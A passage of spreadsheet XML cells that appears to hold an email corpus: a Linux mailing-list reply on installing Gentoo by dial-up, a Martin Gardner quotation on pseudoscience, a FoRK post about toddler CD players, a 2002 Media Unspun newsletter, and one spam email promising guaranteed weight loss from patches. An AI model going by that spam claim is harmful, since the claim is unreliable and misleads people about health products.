 &gt; 
 &gt;  So methinks, I have the software there and all I need to do is install so as 
 &gt; 1) get the necessary programmes to connect to the net and 2) install any 
 &gt; other programmes I might need.
 &gt; 
 &gt;  What actually happens is that if, for example, I attempt to install the KDE 
 &gt; package, the system goes looking for any dependencies on the net despite the 
 &gt; fact that the dependencies reside on my hard drive. Obviously I can't install 
 &gt; anything.
 &gt; 
 &gt;  Have checked all docs on the web page and nothing deals with a standard 
 &gt; dial-up modem or how to tell the package manager to look for the dependencies 
 &gt; on the hard drive.
 &gt; 
 &gt;  Anybody able to help me here?
 &gt; 
 &gt;  Thanks in anticipation.
 Yup I'm running it on my k6 233 laptop. It's tres sweet.
 I would recommend getting wvdial, opening a virtual terminal dialing the internet and then emerging the packages you need.
 I did my install over my home lan and the lan in work (which has DSL - running Linux as firewall/router/mailserver of course).
 But yes you will need at least wvdial to make this puppy happen me thinks.
 In fact it looks as if the base install comes with wvdial for just this kind of instal.
 But I just found this on the Gentoo site for you.
 http://forums.gentoo.org/viewtopic.php?t=4691&amp;highlight=modem
 Specifically
 quote:
 If it is not too obvious, these are the steps I took.
     * Boot off the install CD
     * modprobe serial
     * setserial (if needed)
     * create mount point for other distribution
     * mount other distribution
     * chroot'd to other distribution
     * su - to regular user
     * ran wvdial
     * switch consoles and install as normal
 And yes I do give better technical support to people who use
 distros I like.
 I'm only laughing on the outside 
 My smile is just skin deep 
 If you could see inside I'm really crying 
 You might join me for a weep.
 &lt;&lt;At your service Madame&gt;&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] FWD (SK) Re: Quotation wanted [pseudoscience - a skeptic's view]
</t>
  </si>
  <si>
    <t xml:space="preserve">The material appended below comes from Martin Gardner's
 book _Fads and Fallacies in the Name of Science_ -- revised
 and expanded edition published in 1957 by Dover Publications,
 Inc. (New York City).
 Bill Bennetta
 _________________________________________________
 "[M]ost pseudo-scientists have a number of characteristics in
 common.
         "First and most important of these traits is that cranks work
 in almost total isolation . . . in the sense of having no fruitful
 contacts with fellow researchers. . . . The modern crank insists
 that his isolation is not desired on his part.  It is due, he claims,
 to the prejudice of established scientific groups against new
 ideas. . . .
         "The modern pseudo-scientist . . . stands entirely outside
 the closely integrated channels through which new ideas are
 introduced and evaluated.  He works in isolation.  He does not
 send his findings to the recognized journals, or if he does, they
 are rejected for reasons which in the vast majority of cases
 are excellent.  In most cases, the crank is not well enough
 informed to write a paper with even a surface resemblance
 to a significant study.  As a consequence, he finds himself
 excluded the journals and societies, and almost universally
 ignored by the competent workers in his field.  In fact, the
 reputable scientist does not even know of the crank's
 existence unless his work is given widespread publicity through
 non-academic channels, or unless the scientist makes a hobby
 of collecting crank literature.  The eccentric is forced, therefore,
 to tread a lonely way.  He speaks before organizations he
 himself has founded, contributes to journals he himself may
 edit, and -- until recently -- publishes books only when he
 or his followers can raise sufficient funds to have them printed
 privately.
         "A second characteristic of the pseudo scientist, which
 greatly strengthens his isolation, is a tendency toward
 paranoia. . . .
         "There are five ways in which the sincere pseudo-
 scientist's paranoid tendencies are likely to be exhibited.
         "(1) He considers himself a genius.
         "(2) He regards his colleagues, without exception, as
 ignorant blockheads.  Everyone is out of step except himself.
 Frequently he insults his opponents by accusing them of
 stupidity, dishonesty, or other base motives.  If they ignore
 him, he takes this to mean his arguments are unanswerable.
 If they retaliate in kind, this strengthens his delusion that he
 is battling scoundrels. . . .
         "(3) He believes himself unjustly persecuted and discriminated
 against. . . .
         "(4) He has a strong compulsion to focus his attacks on the
 greatest scientists and the best established theories.  When
 Newton was the outstanding name in physics, eccentric works
 in that science were violently anti Newton.  Today, with
 Einstein the father symbol of authority, a crank theory of
 physics is likely to attack Einstein in the name of Newton. . . .
         "(5) He often has a tendency to write in a complex
 jargon, in many cases making use of terms and phrases he
 himself has coined. . . ."
 -- 
 Terry W. Colvin, Sierra Vista, Arizona (USA) &lt; fortean1@mindspring.com &gt;
      Alternate: &lt; fortean1@msn.com &gt;
 Home Page: &lt; http://www.geocities.com/Area51/Stargate/8958/index.html &gt;
 Sites: * Fortean Times * Mystic's Haven * TLCB *
       U.S. Message Text Formatting (USMTF) Program
 ------------
 Member: Thailand-Laos-Cambodia Brotherhood (TLCB) Mailing List
    TLCB Web Site: &lt; http://www.tlc-brotherhood.org &gt;[Vietnam veterans,
 Allies, CIA/NSA, and "steenkeen" contractors are welcome.]
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr Fork writes:
   Jim Whitehead writes:
 &gt; &gt; For toddlers, pressing play must cause the music to start immediately,
 &gt; &gt; within half a second, for the toddler to get the causality and not press
 &gt; the
 &gt; &gt; button multiple times.
 &gt; Or some sound indicating that the music will start real soon now.
 A tonal countdown would be nice.
 &gt; &gt; What would the ideal toddler CD player be like? It would immediately start
 &gt; &gt; playing a CD after it was loaded.
 &gt; It'd be an MP3 player with solid state storage... instant on.
 Hmm. Seems like every CD player should include the
 capability to rip, encode, and cache the last few CDs 
 inserted. 
 Playback would then never need to face seek delays... 
 after the initial ripping, the only use of the laser 
 pickup would be recognizing which CD is inserted --
 which might be doable faster than a seek-and-start-at-
 first-track operation.
 You could also take the CD out while it is "playing".
 Hmm. If the CD is still in the cache, maybe you don't
 even have to insert it. Or choose it from a step-through
 UI. Instead, you just wave it at an electronic eye of
 some sort... and the player recognizes it from the 
 silkscreening. Kids would like that. "Play this," they'd
 say, facing the CD at the player, and the player would
 start immediately.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_26B382_01C24DC8.0B7C5210
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 1) Join the Web's Hottest &amp; Fastest Growing Community
 It Is So Hot! &lt;http://www.adclick.ws/p.cfm?o=259&amp;s=pk007&gt; 
 2) Guaranteed to lose 10-12 lbs in 30 days
 Slim Patch - Weight Loss Patches
 &lt;http://www.adclick.ws/p.cfm?o=249&amp;s=pk007&gt; 
 3) Get the Child Support You Deserve
 Free Legal Advice &lt;http://www.adclick.ws/p.cfm?o=245&amp;s=pk002&gt; 
 Have a Wonderful Day, 
 Offer Manager
  &lt;http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417&gt; 
 ------=_NextPart_000_26B382_01C24DC8.0B7C5210
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 1) Join the Web's Hottest &amp; Fastest Growing Community&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D259&amp;s=3Dpk007" =
 target=3D"_blank"&gt;It Is=20
   So Hot!&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   2) Guaranteed to lose 10-12 lbs in 30 days&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D249&amp;s=3Dpk007" =
 target=3D"_blank"&gt;Slim=20
   Patch - Weight Loss Patches&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   3) Get the Child Support You Deserve&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D245&amp;s=3Dpk002" =
 target=3D"_blank"&gt;Free=20
   Legal Advice&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
   Have a Wonderful Day, &lt;br&gt;
   Offer Manager&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;a =
 href=3D"http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417"&gt;&lt;img =
 border=3D"0" =
 src=3D"http://209.63.151.9/trim/?17%7C308236%7C6645"&gt;&lt;/a&gt;&lt;/center&gt;&lt;/body&gt;=
 &lt;/html&gt;
 ------=_NextPart_000_26B382_01C24DC8.0B7C5210--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bush Covers the Waterfront
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1034083278-26594-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color:
 http://newsletter.mediaunspun.com/index000021410.cfm
 Media Unspun
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 October 8, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * BUSH COVERS THE WATERFRONT
 * THE BIGGEST CABLE HOOKUP
 -----------------------------------------------------------------
 EDITOR'S NOTE
 -----------------------------------------------------------------
 Is Media Unspun useful to you? Then pass it on to a colleague.
 The more readers we have, the more successful we'll be. The more 
 successful we are, the more useful we can be to you. Pass it
 on!
 Media Unspun serves business news and analysis, authoritatively
 and irreverently, every business day. An annual subscription
 costs $50, less than a dollar a week. If your four-week free
 trial is coming to an end soon, please visit
 http://www.mediaunspun.com/subscribe.html and sign up via credit card 
 or check.
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 Pop!Tech 2002
 October 18 - 20, 2002: Camden, Maine
 Join 500 big thinkers to discuss
 the collision of technology and culture
 Register now at: http://www.poptech.org
 -----------------------------------------------------------------
 BUSH COVERS THE WATERFRONT
 -----------------------------------------------------------------
 It may seem like all Iraq, all the time in the Oval Office, but
 the president has at least one other thing on his mind this
 week: that pesky port lockout. The freight still isn't moving,
 factories are running out of parts, produce is rotting, and
 retailers are more freaked about Christmas with every passing
 day. 
 On Monday, Bush stepped in and appointed a three-member panel to 
 see how badly this shutdown is hosing the economy. (We hope this 
 isn't a difficult question, as the panel's been given all of one 
 day to report back.) When Bush gets the report on Tuesday, the
 next step might be a court order to reopen the ports under the
 1947 Taft-Hartley Act. That would send employees back to work
 for 80 days while federal mediators duke it out over the
 disputed contract and retailers lower their Xanax dosages.
 Invoking Taft-Hartley requires a threat to national health or
 safety -- not the economy. But Labor Secretary Elaine Chao
 covered that base in a statement on Monday, saying the work
 stoppage threatens the flow of supplies to the military (we knew 
 Iraq would be in here somewhere). "Union officials quickly
 responded that their members have been unloading military cargo
 throughout the 10-day shutdown," said the L.A. Times, but an
 anonymous Bush administration official "said that only a portion 
 of what the Defense Department needs has made it ashore."
 Politically, this has been a tricky one. Using Taft-Hartley
 would annoy labor right before congressional elections. On the
 other hand, "Voter discontent with Bush's handling of the
 increasingly fragile economic recovery has begun showing up in
 polls, and such concerns may have outweighed the political
 danger to the Republican administration," said the San Francisco 
 Chronicle. Also, Bush stepped in on the same day that a poll
 reported two-thirds of Americans wanted him to focus more on the 
 economy. "Though the administration promised an unbiased
 examination of the lockout, Bush appeared to have made up his
 mind that it was hurting national security and the economy,
 andmerited federal intervention," said the AP. 
 As for Taft-Hartley, it's not exactly famous for solving labor
 disputes. Often the 80-day cooling-off period ends, and workers
 simply walk out again (or get locked out again, in this case).
 One gets the sense, however, that fixing the dockworkers'
 contract isn't the point of this particular 80 days. It's 78
 days until Christmas. The race is on. - Jen Muehlbauer
 President Acts To Halt Port Lockout for 80 Days (Seattle
 Times)
 http://tinyurl.com/1usn
 Bush Expected To Act on Ports Crisis 
 http://www.accessatlanta.com/ajc/business/1002/08ports.html
 President Moves Toward Forcing the Reopening of West Coast
 Ports
 http://www.latimes.com/business/la-fi-ports8oct08001439,0,1021983.story
 Bush Takes Step Toward Halting Lockout After West Coast Port
 Talks Break Off (AP)
 http://tinyurl.com/1usk
 White House Intervenes on Docks Dispute (Financial Times)
 http://tinyurl.com/1usm
 Cooling-off Period Likely in Port Fight (SF Chronicle)
 http://tinyurl.com/1usp
 Bush Moves Toward Halting Port Shutdown
 http://www.nytimes.com/2002/10/08/national/08PORT.html
 Trouble On The Docks
 http://online.wsj.com/page/0,,2_0864,00.html
 (Paid subscription required.)
 Charges of Politics Have Dogged Taft-Hartley Act
 http://seattlepi.nwsource.com/business/90243_hartley08.shtml
 Taft-Hartley Act No Quick-Fix For Port Dispute (Reuters)
 http://www.forbes.com/work/newswire/2002/10/02/rtr739458.html
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 SPECIAL OFFER!   Save 24% on a subscription to MIT TECHNOLOGY
 REVIEW. Get an inside view into the technologies, deals, and
 companies emerging from one of the leading research institutes
 -- MIT. 
 http://www.technologyinsider.com/new/news1 
 -----------------------------------------------------------------
 THE BIGGEST CABLE HOOKUP
 -----------------------------------------------------------------
 wo birds want to join forces and the FCC is about to cry "fowl." 
 We mean "foul." The two dominant direct broadcast satellite
 players want to join forces, the better to compete with Big
 Cable. Federal regulators, both the FCC and the Justice
 Department, are concerned that the resulting conglomerate of
 DirecTV with Dish Network would command roughly 95% of satellite 
 service in the US.
 The press could not settle on a price tag for the proposed
 merger between EchoStar Communications and Hughes Electronics -- 
 it was described as being worth anywhere from $15 billion and
 $25 billion. It was a challenge to keep the players straight, as 
 some outlets talked of a merger between the corporate parents,
 and others referred to the service monikers. Hughes is DirecTV
 and EchoStar is Dish. All straight?
 The two companies sent a letter to the FCC urging them to hold
 off ruling on (read, rejecting) the merger until the Justice
 Department has spoken. EchoStar and Hughes offered unspecified
 "major revisions" to the deal that they want to discuss with
 Justice in the next weeks.
 The Wall Street Journal delved deeply into the form those
 revisions could take -- specifically, selling some frequencies
 to Cablevision. The Journal reported that Cablevision has wanted 
 to get into the satellite business for 10 years and outlined the 
 cable company's plans and past spending on such a project.
 TheStreet.com turned in an extensive analysis of the deal for
 investors in the satellite space. It seems the market for
 expanded-service television may be nearing saturation.
 TheStreet.com quoted an analyst's report which concluded,
 "Consumers should benefit from ... continued rivalry, but
 shareholders may realize much smaller returns."
 The New York Times and the Journal both mentioned Rupert Murdoch 
 waiting in the wings. Last year Murdoch's News Corp. bid for
 DirecTV, but lost out at the last minute to EchoStar. If the
 current deal falls through, he'll be back. - Keith Dawson
 EchoStar and Hughes Propose Concessions in Bid to Save Deal
 http://online.wsj.com/article/0,,SB103403314258094560,00.html
 (Paid subscription required)
 Regulators Set to Block EchoStar's Hughes Purchase
 http://online.wsj.com/article/0,,SB1033939901346228393,00.html
 (Paid subscription required)
 'Last-ditch effort' (Rocky Mountain News)
 http://tinyurl.com/1upi
 EchoStar, Hughes See a Glimmer of Hope
 http://www.thestreet.com/tech/georgemannes/10046366.html
 F.C.C. Asked to Put Off Merger Ruling
 http://www.nytimes.com/2002/10/08/business/media/08BIRD.html
 EchoStar, Hughes ask FCC to defer decision
 http://www.nypost.com/business/59145.htm
 EchoStar, Hughes offer merger changes (Reuters) 
 http://news.com.com/2100-1023-961138.html
 Delay in satellite-TV merger OK requested (AP)
 http://www.bayarea.com/mld/mercurynews/business/4236430.htm
 EchoStar, Hughes Seek to Delay Ruling
 http://www.latimes.com/technology/la-fi-echo8oct08,0,3454976.story
 EchoStar pleads to FCC on merger (Denver Post)
 http://tinyurl.com/1ut7
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 SEC Probes AOL-Oxygen Pact For Double-Booking of Revenue
 http://online.wsj.com/article/0,,SB1033938113684731193,00.html
 (Paid subscription required.)
 Tivo Raises $25 Million in Stock Offering (AP)
 http://www.siliconvalley.com/mld/siliconvalley/4235118.htm
 WorldCom Officer Pleads Guilty to Fraud
 http://www.washingtonpost.com/wp-dyn/articles/A57300-2002Oct7.html
 Two Magazines Are Shut and a Third Revamps
 http://www.nytimes.com/2002/10/08/business/media/08MAG.html
 Regulators Say They Have CSFB 'Smoking Gun'
 http://www.usatoday.com/money/industries/banking/2002-10-06-csfb_x.htm
 Expected Cold Winter Could Increase Natural Gas Prices 
 http://www.accessatlanta.com/ajc/business/1002/08gas.html
 Frozen World Found Beyond Pluto
 http://www.msnbc.com/news/818195.asp
 Fool Me Once
 http://www.nytimes.com/2002/10/08/opinion/08KRUG.html
 New Northwest System for Internet Bookings
 http://www.nytimes.com/2002/10/08/business/08MEMO.html
 The Fastest-Growing Tech Companies
 http://www.business2.com/b2100/0,,1-1,00.html
 Debating the Baby Bells
 http://www.nytimes.com/2002/10/07/business/07PLAC.html
 (Paid subscription required)
 Silicon Valley Is Yearning For User-Friendly Microsoft
 http://online.wsj.com/article/0,,SB1034036651300028760,00.html
 (Paid subscription required)
 -----------------------------------------------------------------
 -----------------------------------------------------------------
 Do you want to reach the Net's savviest audience?
 Advertise in Media Unspun.
 Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com 
 today.
 -----------------------------------------------------------------
 STAFF
 -----------------------------------------------------------------
 Written by Deborah Asbrand (dasbrand@world.std.com), Keith
 Dawson (dawson@world.std.com), Jen Muehlbauer
 (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com).
 Copyedited by Jim Duffy (jimduffy86@yahoo.com). 
 Advertising: Erik Vanderkolk (erikvanderkolk@yahoo.com). 
 Editor and publisher: Jimmy Guterman (guterman@vineyard.com).
 Media Unspun is produced by The Vineyard Group Inc. 
 Copyright 2002 Media Unspun, Inc., and The Vineyard Group, Inc.
 Subscribe already, willya? http://www.mediaunspun.com
 Redistribution by email is permitted as long as a link to
 http://newsletter.mediaunspun.com is included.
 -|________________
 POWERED BY: http://www.imakenews.com
 To be removed from this list, use this link:
 http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzzz-unspun@spamassassin.taint.org
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzzz-unspun@spamassassin.taint.org%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzzz-unspun@spamassassin.taint.org
 ------------=_1034083278-26594-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;!-- _IMN:H_ --&gt; &lt;title&gt;Media Unspun&lt;/title&gt;
 &lt;!-- 
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 **********************************************************
 CREATED: October 8, 2002 09:18:59 
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="all"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 	&lt;META http-equiv="Cache-Control" value="no-cache"&gt; 
 &lt;style type="text/css"&gt;
 &lt;!--
  .link {color:#000000; text-decoration:   none; }	.link:hover {color:#FF3300; text-decoration:underline;}	
 	.g-article_title, .g-article_url, .g-article_full_story,
 	.g-article_printer_link, .g-contents_article_title,
 	.g-topics_topic_title, .g-issue_issue_title, .g-issue_issue_info,
 	.g-survey_results_link, .g-menu_link, .g-letter_summary_title,
 	.g-letter_summary_author, .g-letter_summary_date,
 	.g-letter_summary_location, .g-letter_post, .g-letter_view_title,
 	.g-letter_view_author, .g-letter_view_post, .g-footer_publisher,
 	.g-footer_tellafriend, .g-footer_archive, .g-footer_pdf
 	{color:#000000;text-decoration:none}
 	.g-article_title:hover, .g-article_url:hover,
 	.g-article_full_story:hover, .g-article_printer_link:hover,
 	.g-contents_article_title:hover, .g-topics_topic_title:hover,
 	.g-issue_issue_title:hover, .g-issue_issue_info:hover,
 	.g-survey_results_link:hover, .g-menu_link:hover,
 	.g-letter_summary_title:hover, .g-letter_summary_author:hover,
 	.g-letter_summary_date:hover, .g-letter_summary_location:hover, 
 	.g-letter_post:hover, .g-letter_view_title:hover,
 	.g-letter_view_author:hover, .g-letter_view_post:hover,
 	.g-footer_publisher:hover, .g-footer_tellafriend:hover,
 	.g-footer_archive:hover, .g-footer_pdf:hover
 	{color:#FF0000;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a281108918593907-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a281108918593907-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a281108918593907-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a281108918593907-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a281108918593907-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a281108918593907-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a281108918593907-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a281108918593907-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a281108918593907-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a281108918593907-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a281108918593907-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a281108918594507-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a281108918594507-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a281108918594507-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a281108918597543-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a281108918597543-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a281108918597543-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a281108918594847-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a281108918594847-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a281108918594847-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a281108918594847-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a281108918594847-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a281108918594847-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a281108918594847-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a281108918594847-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a281108918594847-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a281108918594847-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a281108918594847-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt; 
 &lt;body bgcolor="#EEEEEE" TEXT="#000000" &gt;
 &lt;div align="Left"&gt; &lt;!--IMN:TOP--&gt;&lt;table bgcolor="#000000" border="0" cellpadding="1" cellspacing="0" width="650" &gt;
 &lt;tr&gt;&lt;td&gt;&lt;table bgcolor="#FFFFFF" border="0" cellpadding="0" cellspacing="0" width="100%" cols="1"&gt;
 	&lt;tr&gt;&lt;td width="644" valign="top" bgcolor="#FFFFFF"&gt;&lt;!-- 1,1:footer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000021410.cfm&amp;XXDESXXissue_id=21410&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a281108918593907-footer_tellafriend"&gt;
 			&lt;font size=4&gt;Pass it on...&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 1,2:header --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 		&lt;table border="0" cellpadding="1" cellspacing="0" width="100%"&gt;
 		&lt;tr&gt;&lt;td colspan = 3&gt;
 				&lt;a href="http://www.mediaunspun.com"&gt;
 				&lt;img src="http://a298.g.akamai.net/7/298/5382/100802091859/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="Media Unspun" hspace="6" vspace="1" align="top" width="150" &gt;&lt;br&gt;
 				&lt;/a&gt;
 					&lt;em&gt;&lt;font face="Arial" size="3"&gt;
 					What the Press is Reporting and Why (&lt;a href="http://www.mediaunspun.com"&gt;www.mediaunspun.com&lt;/a&gt;)
 					&lt;/font&gt;&lt;/em&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 	 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;hr noshade size="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 		 &lt;tr&gt;
 				&lt;td align="left" width="33%"&gt;
 				&lt;font face="Verdana, Arial" size="1"&gt;
 							Tuesday, October 8, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table bgcolor="#FFFFFF" border="0" cellpadding="0" cellspacing="0" width="100%" cols="2"&gt;
 	&lt;tr&gt;&lt;td width="483" valign="top" bgcolor="#FFFFFF"&gt;&lt;!-- 2,1:contents --&gt;
 &lt;font face="verdana,arial" size="2"&gt;&lt;br&gt;&lt;FONT face=Arial size=4&gt;&lt;STRONG&gt;Top Spins...&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/font&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a99481"
 						class="a281108918594507-contents_article_title"
 				&gt;
 			Bush Covers the Waterfront
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,2:contents --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a99482"
 						class="a281108918597543-contents_article_title"
 				&gt;
 			The Biggest Cable Hookup
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a99483"
 						class="a281108918597543-contents_article_title"
 				&gt;
 			Other Stories
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
